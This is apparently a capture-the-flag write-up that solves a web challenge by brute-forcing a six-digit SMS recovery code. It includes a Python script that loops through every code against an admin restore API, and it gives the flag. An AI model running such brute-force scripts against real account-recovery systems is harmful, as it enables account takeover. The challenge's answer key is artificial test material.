Admin

I'm not an expert, but it seems to me that something needs to be hacked here

• URL: http://sherlock-message.ru/admin

Recon

Forgot password prompts an Javascript alert:

A six-digit secret code has been sent to your number. Enter the code from SMS:

Which expects you to enter a 6 digit code from SMS.

Bruteforce

We tried bruteforcing the md5 hash locally with various inputs, but this did not work.

Solution

#!/usr/bin/python
import requests

r = requests.post("http://sherlock-message.ru/api/admin.restore").json()
cur_hash = r['response']['new_hash']

for i in xrange(0,999999):
    v = "%06d" % (i)
    print "TRYING %s.." % (v)
    d = { "hash": cur_hash, 'sms_code': v }
    r = requests.post("http://sherlock-message.ru/api/admin.restore", data=d).json()
    print r
    if r['response']['need_sms'] == False:
        print "GOT IT!!"
        print r
        exit(0)
    cur_hash = r['response']['new_hash']

We bruteforce the SMS code online with the above script. Eventually we received the response:

{u'status': u'success', u'response': {u'need_sms': False, u'message': u'FLAG{bruTe_with_hash_f0rce}'}}

Flag

FLAG{bruTe_with_hash_f0rce}